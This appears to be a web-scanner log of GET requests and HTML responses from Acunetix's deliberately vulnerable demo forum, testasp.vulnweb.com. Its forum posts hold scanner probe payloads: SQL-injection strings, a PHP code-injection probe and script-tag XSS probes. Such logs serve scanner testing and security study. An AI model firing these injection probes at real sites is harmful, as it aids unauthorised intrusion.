<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>'.print(md5(31337)).'</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=31 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4207 |
Response Body - size: 4,207 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 2+737-737-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 2+737-737-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 2+737-737-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=32 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4255 |
Response Body - size: 4,255 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum "acxzzzzzzzzbbbccccdddeeexca".replace("z","o") </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=33 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4207 |
Response Body - size: 4,207 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3+737-737-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3+737-737-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3+737-737-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=34 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4165 |
Response Body - size: 4,165 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555'"()&%<acx><ScRiPt >V7NV(9847)</ScRiPt></div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=35 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4201 |
Response Body - size: 4,201 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3*2<(0+5+737-737) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3*2<(0+5+737-737) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3*2<(0+5+737-737) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=36 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4162 |
Response Body - size: 4,162 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>'"()&%<acx><ScRiPt >V7NV(9478)</ScRiPt></div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=37 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4201 |
Response Body - size: 4,201 bytes. |
